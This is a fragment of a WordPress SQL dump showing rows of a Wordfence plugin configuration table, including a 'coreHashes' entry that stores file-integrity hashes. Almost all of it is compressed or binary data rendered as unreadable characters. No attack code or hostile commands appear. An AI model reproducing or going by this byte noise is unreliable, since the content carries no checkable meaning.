Ëç<(kv"]u¿@×^ÓõŒ Ê6LÙv~”“ãB9¹çèFÊGÊ|…r¿ÿ¤[]ÌéÖÏ2Êò‚ò74PþöÅTÔäDz™ÓÃ…:ôèÌ*þöJÞ]¦§£OR©g_*\r2§Òs*Ó\ZHeëÞP¹²-•ÿÞF•Çs¨ª‹=U;¢êü2ªuéIµGÒ»ÕôîL ½·ï¤÷?fPÃ”ú(-Ô¿‡šo†Rsó~úÔòµhí¦–KmôùÅKj_º‚Ú«¨£Ou¸UÐ÷Ôëôs@ý\\Ù‹ÄÊ†„Æp—ÍÌ];-X!²‘rSYq¢÷?–•Î¦r¯=VÎög•§UÜÏ.‰û½yÉª]G°êSVmVäuXm~''«eÞäA}‡òà¦<¸Ñ™µæùòÐJÖYpƒu÷M`ÝÎ<ÌÚ„‡eO`½¹ÏÙ`ô56ÈëÍ#V­æa<âx	ø¤Á#\r×ñÈÆé<º[½lÏãÌ–ñxã¾<a–:Oÿ„''ºÚ°±ïdž<Ã''‡íä)Î3Ù¤L‡§ž^Ì3—&³i~ÏŽW`³ªM<Çí[&Ýb+å,žçp‹íÇ{²½ï^0¶œZGòâ;5¼ôt/_WÀËƒ?óŠ²\rìRmÅ®ó&ðª_ÙÍ«‰ÝN]e÷Óyu-ìqÙ=¯®c¯±±¼&Bx­e(¯½¶×Õ²·§&{''ñº?ö™bÊ¾™£ÙO÷oPÿ‡f.â@-\\~€ƒŠ¬9¨]wm±äÝ£ðç¼¯Q•ƒ·˜qð8~µƒCŒ¢8tq9‡Þ©äÃO{pØštË¨æ°6|´s&»Ù•g#Gä_áˆ¯8Ò¹‘#ëð	c\r>¹Q£S?sLèO>Õx‹Oý[Ã±Š9V«†OoãÓâÌñ+ïpüÝ•œà“ÄIƒù¬ÞNÞèÍÉMyœü§(ás³¾óyýÁ|q®§¯häô}…œ¡®ÆÃ”ùï‰‡8«þ&_¨äœöf¾ñk-çªÕð­ò£|{ÈN¾Ñ“ï®Æw}þæ|ï|ïø..(ÚÌ…;êù¡"òÃ¼(~Ø–ÎÛºó“ÝÕü"ùépu.7Iáç¥E\\ñÐ+^çs¥ßa~i;ž«ûÀ¯nüà×#fòë†g\\ÓÅƒk5–s­åN~SØ…ßü;ënöáº;ƒùmã®ŸìÎõÛ>rýµHn¨|ÌCÇp“á}þ4@…?­«åÖ¿¶ò×Ü%üMÏŽ¿Y~ä§…ó±^Œg3÷béÚ¯QòPç‰Ò6]Q>Q''ý]¾ˆêjQ«}!êeWdðèå¢5!Q†ä„‹v€¿hÇgŠö}O\Z8Wt"~XOÑ)ÎÝŽ2ì¤±èï*ÃÇ4‹þ $Ñ?³Cú_ƒ¯ûÄ€úË(íE‡ÄÐÂHÆ<8(c*AÆ™dÊDj•IË£dJ¢ºLm6—ÛÞŠé5±ÈV«Q±buJSlUŠÅ6Ä¶¦‡ØÖ¾ÛwŠ]òT±ŸÚ)ó[ÌdAâHYxÚU‚£8Î*”%æÊ²ÔŒeiL”8¹«ŠÓ«4Y5t¤¬ÚT#«;‹WIŠ¬õñïáÉºæñ)	_+KY?{Œø÷W¿4Lä¯àÙº3M¶(JçzÙi¥(;ó‹%ØÓXö''»Jˆz›LÒ’ƒÿv“Ð˜>rx‡„\rkˆx+‰´è.‘W‚ä„ÆZ9ñ£‹D5õ–˜Î?äTâP‰ÝX-	+NHâ‘‹’XV()k^KJ`„¤ìé''©cý%uFœS“ói#$Ó­H²„I–ËsÉªØ"Yµ%rõÓ¹6''A²"$''*Rrí­%×©@òÞºÉœRÉ?T$ù¡îR01J\n''Î“BUyV*u\näq“<þÞEŠwIqM ·¶HIÎgy:ÐJžÎ<$¥cÊ¤´­@ÊŽIù~y¾þ‹Tx{HÅ¶¹RY Uwäe[­¼ú­BjÞšKMÛZ©=~Bê‚×É;…ÙòNËEÞMÈ“ú9(\rý{KÃÛÒÐž%.½¥i¸‹|2Ú -“µäËÙfùR‘+­»Hë_i½>G¾fÍ“¯gåk{|í¨•öíÊ·ÁQÒ1Ý]:¶™HGü"é¨nÎûKäç\ZSùù Mð•¦Ð§$a‹­ÂÍ©Ãflÿ?ÉwZjÈ‘\0', 'no');
INSERT INTO `wpou_wfconfig` VALUES
('coreHashes', '‹\0\0\0\0\0\0\0€æa:2:{s:4:"hash";s:64:"55907aa570e1fd67ee224503e3ec708874d11fb164c6bbc13169789a64e480e4";s:6:"hashes";s:144384:"\0­ˆëW7‡Ž±ht#“	²šq¡»)¤ºdÅèú$\0ÐÉ\0(Æë°xJ{ìh¢Ï®%§\r^²×:€û(ã5Á—\0(Ðœ˜úZúY÷Y˜@àIq©î›È—#áÑT»áù@\04ß—¼t‚\\v¦QçüÞ¹¾ô''_ËáÂajxÊÒ¦Û\0E=j¶ƒËÈ‹|p8.æÂ½ÿ÷ËÖ¤ñóSGpåƒ\0Eq­x¿ƒ”ÃPa§ˆ÷>bváDª¿o4VŠG;a<±Þ\0^NÙå¼˜aðe|K ·-àÆÜ°ÒÍÉœ=ç„\0bœ&Fžö˜³ÿ%|w›í*Qr;|/Š=(A§óä<ü\0…‘¥#æBí5à¿j†ó$#õàj!ŸµþÐbN€ôjö\0Û§ÿå4(ÊK I|Š„¯0ºìµqD.^¾v¯\0>|æ;(ß¯\\W*œ7?Œö\nØNªÁ2=Ã7[Uo\0µëiäÓÖ„"ÞûãÆ]Ñ^è°þXDþ“2](\0¹‡ö/Œ¡o)öô:4]±ã_Çøß+Ì”ëŽc½þ×\0Ôeµ*ë@’t„À±"éáƒq	ÈNþ’5÷„H¥\0ä9Ûw’i„ó×í5‚ßÂÐ“§Ã}ˆÿ´hÂÌ\0ëüZÌˆ»~í0±=ïèG‡#´C÷ÿZ}Å* †p\0íT|Ì…_¬ÕSò8­´O0Î¼ªÂ¸0ªÃª‰6•\0÷ù-bsèG¨\n(hr\Z.ónåõù!eÈ×z.Yx€×UÏiÍ5G èÜ$PÂüuÍvAT‰‘À´pŸlçJ¢›}¢‚¶a\ZÈ\0VX=:ˆ‚8~"2ýÊ¦D¶IèXVªf¸EW£Ïe“€ßG§]¸ñ´q)6—í	ÅjÜí”õnNØ¤^}0[PœKXs“¤+È‰a±w©S‚¶à[óU`|WS³PDæ°ç¾ŸNh¬Èb!•Æò­#§8iß>kq6¿R„Eÿ5ž”:—"ü…;B­Ži.qXõàA4û­äuUœˆ+×±Ë…´Ï±„ç·Tª_^gyªzG‚L"1°û³U}6:ŸŸl|‡ì(ãœ¦Á–q{ÆðVÀ~uê<¢Dh¦o*¿¯ŒcÏ¬0ßñÎÁx¢cl$‡	™4ÚÝm•·äÉøo¾¿`vA:§ø™ìˆ`{rfËÁï_ûS3/sÙmÚ?dš^Í”0ßX0ã#q–Â-mlÏ*€Ï#TñŒc™ÁxðEµÇÂƒyîˆÅ©œâHœà÷î>Ìã$É2þäŽ]â’%Æì*œ6Þ\\þdpùÛ›!½s%Ÿà]Z×YÇoåŠÝ¿ŸþŸ¥„©‘ôÉr;GÐ÷"Š¥5 ·¡}ìx(ÚÓrÜ:a,zmKƒH1|/ã†Ñ+ò©ñGu÷Éß&Ãw]ê-H€\rRWý½\\Ì5õ¦õò''³Œ=ÃP–Å¹ÜÊsZFˆÔ¤oD-x?ì< u¶ü„qýXQ€7aiÌ\rICÒpE–KáÈÌð‡y½€kŠÑ©}Ë£œ\\$­p"·&Ìp+^„ºÕ\Zõ{©¯ŽÛÌÂ˜¹5ÿ|™f¢ãµ…SÍLšo3EýxÀºýÑ¥Uãÿ°q¨`Žq4uí¶øZ¢®¹ð°¯[nù8”O£ìr7‡Í0H01YL$RRAhJ6´çM¦w:/ð7š.ÊÚP”Áƒh.BÂU-Ñ—ò''TsÁªz+p¿›×pHaœP04•ÃDí!Ì2å{ÑF°Í¹|á©ö¥¤p8$—hûÂ"dö3ÿ¬ \\•£pY•Qëá£Ž›K4Þ—¸ŽØºðþKu³\0MÔx>]ZÛø"ÑzÑ8ÅŽÇVßMúË»yUL¤…ÁK«ùCËWaå\\°èËÄ\nƒ;è¥0åÄ "f«ÐÎŸïÒ''\rÍ¤ýDÄdMÅ×ÙùÃ÷§sËÇ¿‰ØÚ´ø$2ôj)Ã,\n²'' #6ä§9\nø½^îÎ	ntº"V8ÁM@õHØŸQ÷¯[S$ü‡ÏÚ–©õmKØ2†e²féte¾4ùœš\ZðGG.Àf­±Vy`¸Éÿ)".o[`×ÏÝ\rÉn”óçjn¼viU\n@,›+!%u	re4Ù+JuP$,–WNÙPÙ2Ò"Åž˜,|^âå€yÞ²ðñò/\Z(A°1]ü/Æ…­B‘Mój:­å@Ñ«ÈG+SÛf¶º«ÿ¹dVži‰\n°6W·úÔ‘\\<çOÌEj2¬QòŠ×Ö”\rÀ|þX6ÂìÔîÒ/46¤JòÕÉ?ÔÕæX’GX†~†–u™Ÿúic\râpª«õ´ûQÖÇí™œ½÷\r?c˜LÙTÓŠ•ùîqg¦È«?c—r‡È¸¦t­d®¬æB\rTJÂ,Q“Ó$šTDh×ñÐ((Zdz¶¹vOÿ¯¯Â_•Ÿ;Æ€›³EŒpYö.Õ&}öº_º	ÔQ¿Æ‰ãoSânnûÌµvêø\0)°öÌÓ½SýËnRÀ''÷¢X§^¤ÿäkhûº·ÕÉ‘Ðiæ7´¿–ÝÓ¤å:DILV­\0yÅZþˆ)›¾K‰\nã…ËÜ˜D‹~™‰%Roøïc‰Ö7®\r¦ºL»æ>1ŠÝˆ]š^]¬RÉ¢NF™MôâJÌ,˜ï÷iêI.2 š»>1·ZØ;×¨¾‚1Ô$š!¡‡W:	¨SxïDq5ºà/wºÛ_W:œØ+fð1zù¸g¢¦‹\\Yòúâmõx³GO0ÇÎâjo].ã–½®Bœ=½f~:N¾Ì¤Fa6¢Õ¡Ù\nY ØÓ''ºèiûÂç+­`­ÂfGYbmŸïUP©™M™JéÚ¡0€&CvÂèM“$…Ûèú¶O½·4-K¸	o6Ûlbö1Eå;±7xù?ð-™Ç±Œ¨ZÞzE»Ÿ‰*†nk±»‰E×m@ìžãéöŽéð1s®­Y•#1$Ðé\Z£=I˜ˆŠ¿b£ŽXBr½?Š·ìÍ¥-ô‚!Çiº>¡[¿²eøV{ÐW¢!FµPþb<&Â„AŠàÐüÕ8Ó`Éå]wBËùÎºõ@kp&»›¹h4Ô›µ2¶™ºf''öGÑÓÏIS•æ} }Râ¥…ýJÐ›Z[`Æöm¦ÿI”$=„­ù¼¹D“‹Ö›&ÄÇ¾@+Õ¢ËÐqO.¯Œ…x&Ž®*p§Žö@ýlëÁÐÒþ÷Î’/kz=¬i»êîÒ Sò¨°ÔÀý\Z\Z4Ú¶1é5ÁªÇ2’3\r#?EÉQ·ËØL¶ÕIm$ÏZÊåªB\Zï!„ãœ&šÍ–Ž—Ck†`7‹Ï×''/¹½]äiª²5 \0¼Òµ©Š2SC‚áÅ+2±Èüf!OgÐve½CÞhîÿð”ÖÎ%%Öì-ÓÕ)^\\‰¢\0«t`–kà²@§ƒ›UæOÅ”¤cp¦Ï>ã!8HB6¥Ïàãìâ=“bñÂ‰!§ônŠz\0§OS~Kêøç|$Øëö°T¡ìïÁ…ælJÆøbÿOwŸàÐáÍf\nTÀþ²­Eg\ZUê\røŸ£l{à²SYD7IÕ.`èäµÃ}#Ù§þžôJ4 ¬6éŽ¬½ìM&ð$!2d<žª\\	|\\—?gü\nKN¢eéÓŒ»ð&ÂÐŽuÑ¡Iq™t¼·‹n~T	_j×-˜›†É%³¦?ž7¡0i–»Ë}ÍeÝiZÖO™&E+rXŽe{eª½mXÎÈö<¼:¦KSy{ ®r·>K^sâVS2oõHÖá_îÛ)7¡©šãÐz_oeïÕýÅ­y§^/?h;@râK%àáLP…Çf¨àcË(|Õ_] ÛUÌÍ’o~MEÿèï×†Ý‹Ùs¬ùRpçdÕÎF[ÿü''rÝ5lþ—¥è”åª€Žî”‰X—û¸Ôec2B…“ZŠ	Qój»hÏ!>&“þÆ´sèƒò@Z2]¦óºi¾¨¨](J~nø3ìàÏ¿Ù€hjóqÚoÑ2±†kLý›JQ§c\0Ï8|VÜËA‘üýŠŽNÚº¶)\rÂmäMA¼ÌæD¾°os,–Õðê$»‹ôgJ	áÅ–Ø7l}Øa¡ñ¾ÔÈÁŠ¯Ãw|ÛgRLh!ö°1ÒRóþ&''˜ýk±D'':8YÞ¨KAa¬-¿RHöTÒÿýÿ¥ÕýŠª»(:ó=ß¤''\\Õ\0¨¶¯|Ç8Í(´ˆ]x’Zä´ÏvJ+è~†S‰$Ù‹6ÏîvgAÑœÀÊ‹Q?­j¬`J“ñ©Nõ]î0&–ñb›\0ëV?9´Áº¶Ñ"­.÷I3ô‘2r)rk’+`½NiMçñ2]<¾	¾h\nÚË¥—þOí€3Œ5FžÐÈ\\Ì\0÷žð“,vSçç+p\ný.‡§™é´\rÄJ*RT	ü!ŒæA&–ÕUóBÍtG=_:\\ê]>iŸ£?Î·@Ú¹ÜaKÕºÚ*¿ Ô½+]²€µÒ®gÆ‰^62óG¦ž\rƒS …|±;)¥$=XÁn!Ãº®‚l=Ø@õAÍ°Óñ:ÞV56UÆþx5ôPx››Í&ó¿:V“VæûÚ-qX¹êA9ÀMç4Þà†-²°©t\n{ëÑõ†}ÿMI	AE0NãöÜÊûµ„Å.T0b([Î²Üžª£õíoYdÔÎ%Ü å+£[»Bº•ð f¶<3)|•žŸy-¯d‚°´Êô]`,5†ïl9„oÈ¹¤x«œ;‘ˆõ¾xZŸ Õq@Éõ¶ä51a¥Ixˆ»¼MOYÀUò\r‹ZêtŠKÏ­éuJOyÅ¹¢&Ò¸øÄ*ë‘Ü²Æus#‘žt1ð²#4çÍö´Ãä‚¹\Z€Á''&Ý8Ñ\0Ãª”¿õ›m9;:áÄÍ¼„fÂÆf„)“™¤Iïœ³Í;ÁþPoiÃã§Ú=DáŽ¯ä¤0SlíhsgÜº{”,˜Ì)\Z|œíÞò¯<„\n“x’¾*Ô×óŽý×iÄó–ÕÉ`™€hˆÿ`“P¡*Í¤¹!j1m!–~J­Ž\r¦OÓ]ŽY<yŒ}ƒ\Z»>ÉºH¨¯ðI|ÜÇPôè±ßè®àBb¥½eÔ^üšÎˆ;VT1¨Îcj¨] k^§O×ê¤9«A9/Ø\ZóŒ%˜@b¤.Œ`»ð•š poÖÀïdf¹Æ?»jr£äYåe|ÕHŒ÷h>Ý,‹ecÞ¡–Rúes5-“šàD=ÇÄû<óÚ:3ãÍÏ©‘MçñÔ>»‹ÿrî6ËÔ¤Ðô%z‹uÛ‡7þ}»FËð˜Ä[yx±¯]káÆÝ­÷Yrƒ‡Ö¼9£IV,C2"“•ÉVÑl·—pˆ]l2¢Pïøf>ìõKpÔÇÖšJ”¾™bvw°`î©ªµ*»wé ó}±Ëø©¶*Ê˜ñ˜)>2ƒq¤–e¥€^ÕÀ)ŒP’¦ÇnûGfRô@Ol,>ivÄ:°`ÄtQÆ*·8''¥<“ó\nã‹Á’¼ Jò·;“H`÷QØ6pq¾ÿØaó%ë®ñ\r†Ø	üì"…Anˆ3HØIsÌ:Y¥¤aÁe0BÒ²yõPp\nï­¾¯¨™òÆ!Î›Íÿ»Ù&°ÖÉ…''MºÐ4ãšBŸSøßÉ+''¥4&¼$Ø¡¡óVgg¤áoÎüg~Ùëm/à¡/&t+äùâs×ì¾äÔ"#:Z«Ü¯4ã“‰&_&ÛÇÇ6"xFð|w`AZ_+vL\r}°ŽNßPåÉæ6ƒ«¸Š½¢_ëðÒ°æÝ¾”ýl2¡bž©¹qÃœ$U„v¡ñ	l,s¨ÅÙ"\rûmžè`»áY×“¯U”¶X^žMs÷—6RŸH@ñ	&‰å†¾¤BÇxžö@dÆR#U³ôOþPg›žsHüoè)nÕÎÿWréÎtZìMªÒþè?%†ï¹ˆVúÜÀ¢D±°FvØ9´1{|éö;é\n$ynÈš’hM‹EÔÑ:zŸÜüà@¯ˆÁüÜ*9V›»ŒÎ¼ó[E£¶Bu}<¨î„±\Z#¶d¸4*û?˜œå¸dªQ]Bx.|9Døö:h@ÖÂQÿÏ/U\0-|_Û¢1ùg-ñ+´­·Þ}üÔ˜!^iB³ÐòJüÕ\\W¤]f§œ@@…w£=	.]¶íkZ1Ñ™mÒGõ‚ý]Ôxà0øê•É	14"1œIxªõGL¦[	•‚±>(GáA:ŒýÇ	64µ®ˆç ¹2DMÈMâ$Ë\ræ¾i“\0Ô¬‹	8\\Å¬ç®jùA’Ê”5Ñ+X­œoˆTùm°_|	Më°ìyu$œ1¼ck_‘KÿoÝfÛÏm³…¹%û	g)[.‰r\nào”i×{4Š›Q\n\r8HŒ\rfXðÀè	v¶l»´õÙ®ß÷!ÿð¹ÿP€²mýø•\n6|Ï”K	~ÐõCèÈ«™¯7¤àÃ:À£s&uËäÙìjÔËt	©+ö{RôƒäÓÙ„åÔËnýt,´Çž¦`µ•Î|Uî–	­	½œ#t‰Ì¹»ê«p=¬I"¼¦˜)F	Ö“ÅÜñ-Œ\nqU‰Ëiº×Í-›$àh*íØm™l	æVh˜ÐðLC‰Â»>UÆ8.Å`Æ@<Kéãh	üÍ¿¸ÊU%ÅO¨HÞ¡ñŸ…@¿~x\\6ÎÄ~â\n<º:˜X†hÇQATºÀïì·oŽáp2õ¶¹8>ø\n*„²<×÷ºÓ³³?HM²''VÕéèLî¼''[RÛ\nâÃÔVY"×³è\\ºèX’@;t<HêÕûý\\\nð@&Øê[DqSÞÁÊÓðìàB—×N#F‰B…ä\n#\\˜é,Á-ö-ª*N	VŠÓ»+äÒ:Fç Ó¸‹\n*An•„¸.]éBéÄtúvƒ!‰WÒ§Mw’9ÝûF\n+P_tQÿVoêú©²ª7nÿ\nz#ù8ÍúºÒÛßJ\nDfdvPÿfŽOn:ž“˜ªa†åÐ³Â‘Š„»XÝ\nGkù ~ng˜–m.ë3\\–\nðæ°1i‚ÔjgÖ¸Ó\nv­?Ìuì	ÒÈÈfßh6Ú2Bþƒè?ñ2\03”}¦\nx‰çm¯«…nV=OD¼“\0T­ÚÞ)‰ÏUÜã©\n}.¢’†å×÷væ–e¯\nµ?æ°.zŸªE…ð»ÚÐ+É¡\n‹\\_9(ô)7‚\n—Ö/õSæà''ägßƒ†v•£Ã\n¡9d£Çìgð~@–¤®|ëB-ŸÁ°²œÚý6=£\n¤TÂ[Cp¹±§â(,¬_V+äL\rÛ¨I¹ü(.ˆ„\n¥súH×µÑ‡c ë-y//ý?‡\r®$MÌ¤j3\n§aqYK´JÒ”Î€pù\ZJüj¯\\PÇ˜È\nÔ\n¶¯Ú·›tnŒ\r‰EanòŽJ;}(ïÒÒ™©ñÂ.°Ä9\n¸X:€¼QØ}×+öO—\\ß_“	{¼Ü“C''a×y:¤ß\nÁû ÅW"íˆúëw†\05ÑS NrËý©Š¼šh\n×CãÙ0ÄpFdù°‡l•\0¿ž"uê™~2"õT¯½p\Z\nèvÉ[\0Çõ‡XZppiý.Ì¡c¹;~&Œ†Ýø\nî·Î&ª)h4Ð_`ÕFãL“<—ã:`#pf¢ìò\nù˜˜ÛRW#Þˆ´ å¦Q¥ÆÄ“4E[£''Äz“\r…“)…ƒk³ÌŽOÜdS0éX±z¯ú†_óÈÞÂ61k‡K(£á]1Èz¯ukpR¶!¢‰³Œ—YC8»³Õ`dfh–.^8¦äôÊ!{ÊÀÝFüN‘L{ÎçzÅ)ªú,­"§wÍWÏýS²ŒJÇ²þžÕÁK­SÁª´Àuá¾’¹MˆÂccÖÍÞcdD™(‹Q±Ì\\™\raò•[„J?TÓÐð?ÑÿúG¼d¡æ(s†©ª¢Ôîtô¦BUI+u›˜ÀC¯ãÅ¶…R‘ŸãSF2>Â3`¥ûvÉþ''˜:js(-Nê§²šÖ ¸ï–çNç3ƒì•ô:âVS;ÛÅáCT\n€»] þ¥C‡rJ¾2ŽªËÉm5CZ‡\0Ù/@@1ß1ÎD×Õ®6½¸8g\n)eÄÕÚzéñl¨1ùMH›‘&ÝÆSîð.>õU‘B|2›üÓœOU}¿Ú(Ô°¡ýÀzÌ¹Æ=êä†€Ê0j2¡4\n:‡²W“nþ¨”\\C2tcç2Á¬Ä’ZV†Rêé¡ƒ[§‚l#4ÿË»>1Îµ¢´Eþ€Âl|lh¬®£ÙÊ]ýŒä:ÔYÅˆõ3	š§Óì\\gmÌ»ñ1)q+#ã˜òÙbæ^0rR^º›|Ãë2î¶¥½ZWcæt ®ïV¢ËÁ´Ò°z˜o_Ò²¿ˆYn,ªJš©©½ÎÍ“TÈNBº(Ù-±§gõê\\ICÚž×:rÃn…Ì¿†>TwØD\n®Q¼!˜@iDäøÃr‚è´È­!wz÷L{©ïJÑy7-Ñmé×á“Gé´žYâŠ[¨ÍôãkÊÈEn#XvÕi‡w÷R»:žM7K¬kRŠ¢D·•¬‘.„ó²© L9Œô%±S÷¨³J*˜À–…n''Íªt^ÀÎÐVÉ¹ÅO‡œÆÇì*ó(œ˜„·Š7Y‹î(VÝz|%\0''j·Õ­lø÷Øµ®$hçTCîôßÕžNû8köÈºÉ™y·*™<I\nÆÕÿäª(øÈýx€$ÿðC\nÛ¸mœ-Bî©Ëóì›ìYVAlÍ¼2¾VSü#nÛØòX¼–‹Õ6÷ÃXî”›âñDUÈTö=õ–1O¿@ø,xÔÏý’ˆÝ³Ù Ø)®¼\r&Üd5·s/,—"ìd·ÏNkœ‘N= •í]˜Ù¤.Ž»£2ŒnKúôÖáiÔ_ÈJ½.ÞÙ&t8ö&mKX+ÍC·Æ†\n!‘;[oVùw22³š¹\r»³Þ‰#<*QÐfûš(¥„õ­™\r%¶P¨–˜ÓùcWé-:''2„Uá''FtàÝ©z\r…Š}ÀäŸ¹-V±Ûß°Þ''eCCÊ…ãe-2,0\r1?–;IBœ=S±÷\Z“2ÍÖ¥‘&þ×†Z¤B®¬»\r5CÝÙ–˜òªNËùsÅØkú×úl›''t35¿¶°ª\rNÓæI†Y›·½ø™Ô¯!”Çê6)¬ñI£Y\rQiü^š\ZB|­äf²‘C‘¿è-/r±ÞUÇYÙ¢ÅB\rX·[cdpSs3Ó%.Xóå|AˆºÄwü˜#(JL\ra‚{pë9ÑÙåó(A–)Ë¡…Ì®SPV†Ìsë6ì#i\rnuŠî:Ft\Z±¤"P9ÿµ¸qP¾‰œR¸®PA \r‡¼Ëk•<vWàPäÀœvªãg(HÑ‚µ¢cŽ+d7\r”YÓøtÚW^¤ü¬}rIxÛ¯óºu†$ç/dMkØ\r Uÿò‡:ïwöçëÔ,ÈËß&çK…p&á\ZšÑ\rª7GÙ› ríXylÖï³ <U5p8â­nŽèš\rÂ›Ø×Xd	D\nè£ìñŽ¬q¼bc÷\Zu—íÀ\rÙ“£ÒC7,š¾<ÜúÜp­,ÏLùâµ~rYús#€\rç"¾(qqš6çZN†è´Ïæ–Éû–ÕÅŸ&åh©Ï\rò\nÝîÌ*J–Ô6´¤©¾û”V^±Ï%W\\Ày¬\0Ìì»@:ƒGCÑ)Ì¦Žö|u9 èZ<Pr?s2''íh?IÆÏIëÂ3z(BŸGQ#‰—`päS:eJÇ&„/–ÊáaÉ‹¨“`ï÷þ\nŒ}ûç\Z\\xÕ+ÃG\\%R£µÍO¢¤6³àûí}î°ã•“æ‚«Ä-ªFúkRVËð£6š·ƒG_e\r­¦"ä}ÕQ^uâÕøÀ¿£YtY®‰sNlÉdU|ß7™‘tìUàFY€›Ènˆ[ï\n×§\ZZ\r\n²Â‚Øñd.¤«ji½!ö¯ã!aÔIWRHÛj°wHBBÇí•Îíu¤Xp\0bäUeÒ$OrÎ°Ye¼JX¥pºW	!ëL«	o÷Ñ¦Ÿ?Á11Êæ¨]ûQ[¯Ú7*ûa3ÞÇ¾Úh‰‰,¡UúŽªc\\ë¯kiš² »6uøàJ\n3*¬“KvÊi„åA&à4’ú«=‡DéÖq!è“¸Ö§f;4“™PäZµøeµO!˜vx.eèÓ8—jY¦»ûçß0\Z¢´€èP…P1¯ÔS/ÀÞ0?ëU!õÍˆ¾ß½¸õò6°??ÏÏöZž‘vˆw=2H:õ)x.°ô®‡³Éo\\ÅÔJ†Ât®LUËÕoíõßñ­L¶¿~ŸÐ)6ÓKÏ5S$Ê‚8—ÇÝ×â¡§5gg7ƒ3lsuØ¾«yˆÝà‹Z¢wÚ ›0YE\0éåÏ£èº«i\\ùÂÞ|’¼”˜Í7‰Ùwq‰Ò;,r’íäLXâü†±çÈ\\35qv.Rß¼h<<êï«‘t÷hDŠ$ŒÂ\\ç,ž»t\0_g’X%4.à¦tPš]È>ŽJT41l$yˆ,´ï`p—M¥Çj]#ÚW­B‘TmŸþ½¹7gy\Z¤ ]Oý®Y¤T€­óÁb®PÇšæ˜ˆúFâM…(ñb;ËôKáóæ«g«&\nõ-“ûnzEja ¶#‚[ÕYdIdf@\\‚K2o—–Ø‚/*Ò~ÛHwèÿc@Û2Ží,éòÓù´¶P±0ëíÁºé¦Îãîx`ÕžˆÚdZvsþ.ÔÄk‹’º…Þ\Z¦5Å\0«ºyX“§$Èõjë¤‹ˆÖIˆÂö8¢ÏÌ@t=Þä{9vÔÆ>:Ì·M\ZÔÏµ‘”±¸\rBt\rðÏ×ÌÏ3û‚i½„0bnÂÔj:ž$L gÎƒr´a˜½å­±‚öš„tõC ÿY£\n™ÜHßú$$ŸTƒÌž}^ñpfO]ÅÇ­N3­%\r\\Šà-ØA¹J²KÝªK—àƒý7P¯xeæ''£PHøÿåHýP=,»O=šŽÈÅ+ËÁgØo´Yq¨a|Þ\nk¨3L§#™¼L‹‹ëNÁ·}ïœ\ZøEåùO\\0¸uÅÊFOR\Z)Ä§è„;S ''bN<vÙwúLSÚ»«sT³Å|Ï>QëÎ°Ïi}ÚGåD…£Ž7á OF5ì¢B×NovÙßÈ:A_-3£ûx\ZJ¼B“@k‡y50é“ÏÉ\n­×Qã(çð¯;®4ôÁ.ó¸ò`R‡Åwô‹!óT“ºuwm¡t5Éo\nÌ2A"k”ßšz­ÿ|lSÉPpÜkÔGÆMÑ8Çüƒ•¡ÝÔ¹ÍÜöfòEËx;Ë±£ÉOØ[À÷óÌJ`uOâv&_ÜÙÜ-]ª›ƒÆE–ç;|¯µx$ åí(˜t`"òíð/\Z=á`>&î‡oRŠÖ«Ùúª	æÚ²îç}ÆZ	wé%þö(ð4)¶;\råí;¢)6qi9CôÜ2éÜtÖd64KÕ®ÚAØU)Û³! ž¡Pdlwä+´þ¯>Æ;ç ßO¬±-LûhyŠûML)\\VHÌã3_@AJ!í_°ªdrNßdÒG¢;žÏ·ð6Á<³á°òúº wj›;ÔV½Û4dkÏÔ·Ü>·D‰ŒjÃ,p„Æþk~*Šº®Ýd}ç¯[¼ÔíçHù?âiK¶[¼i¾ú/Û(õ¯‹â^ž\\‚Œö4¢žc-¡ÃÈœ¡þ)öÍ—ÊÛ·õ¢Ò@c.ìV_;qö¦ª:uMø­ÛX®ýœbW…ìZ`ïÄE²Ø¶\rÇSèñkyíì%„/þ-‘Žu_EC©?oÍTgûNLC"Mï61É¿ä\\ˆ)®ji®÷êÁñ]ãm¥†bŠ#¯™«6ˆ§C2 —Îaoß2á¨FýÃäËLØW¡”®%\rVJ~øpŒí$¡Á–P(‹ñqŠÇú\0„RSé;\rsò}¼ºo%Š©XOwR	É\\˜óBÐ;zÜÀÒõùñb#Êqš¾l¦¼EôˆSŒWDò€æLexìÝéª´@m!Ñþ~¶î§Ñ|dûET9v,´WÑ‹‚‡ÜÊ€KKì˜Ñ#\0ªÊf›ç¾€Gº~µ„pÈèoPqë9¨Ã\rbL\\9ö2×¬§†n*PP¼\0A¢wƒ:oHðRRˆESÌG‰ÂÊT-ëa*Qf±,S»7ôÏqÔÌ“<¦U*";b¾r’êÛ^°&Â7jùFÅ‘øú‡ÀÒ±yÐZA"ÊYŒ!•	=¬šxö`Jß©i.¬?w~ë/"w¾U{«’ÒLf×1:Õ¤y;¨&Û†Þ¹[rD«ÞbóNv•Œã¤„¢Õ\nÿ\Zwr‰ÄkHuE¤ììôNÁ/ïJY·’þgöSi÷–)”N]oòëÕ}ß0<Á,ÄíëeS</öÜ“8CÒ©T2I†UXÐjFê¾\rPJ6¬\\íd$Se=gÁ®˜øÛJÞ°S·0¼£il‰ww®4‹:™øÔÚ"D½‹¥€=[•¸ZÌï\r‹‹ç#¦A@Èf3¨1_<ÈÑîv£ÏËü(QNÐÜYCwoéÍÀÛô}zïö/+xÙ±—®\Z8Õîû3¤•¯óóÛ€TÁÑ‘/ºÇ*¨2^ÂoÜ°ì\n­0üþ\0ÓÏ1îx?F(É8Ž¯ÜVíéÅÙ/`8ÜùÐ†ÀÂŒã×t¬2Ô:²]XK%×	EL­Øå„ŸíŽté°~¨nFç^mºÜÄKYÄN§Æ"ãè €tÛhRÏDé†PÂ>(ÕF-Ñ$>Q°ŽA*0l[U[”±µÚA7­EÎOxÆŸ±:Y§Ã{¡ñ ”2gûZÁ“+j{Üh“øöNž.m·Û©+Ë6™œr0Á…±jUÕÊY\r³²ßÏûFË%Îù\\‚V[zŒ´7¶âÂq´ãXÅ{4¦a›û©Ëç4½•¿…=PÔÒž%^\\$¶ürfš’z˜;@h§¢è¬¬&§f{»Š2ðTˆ€,Jg~ÄKOb¿‚HÖ$(ûÀþ\r_®\nt¤lì	ó6±àAx	70)P;ç¤\01¼«œM{}iÕ®ƒüEÔß\nì°}HNfÎ0/Á,u¶ÞøIøÀÆÿò’õ)æ-[\0ª·=Ö¹?¤+;Q¦…/×¬W/{º˜ßšlDA£„UÉêRp½rmm\rF6í©ãúŒØ·ˆ¡iŽ(":ž@Ÿcà‹·: <R)‚¥%+:Á¼ø¨ÉG%Cy*àm?Û´¶/Ä\r!ÑÿÌ…æiªAHK2°ïÄw:Û%.ó;j@Û´£)H&î—R‘×°£ÄíRÖãÿwci”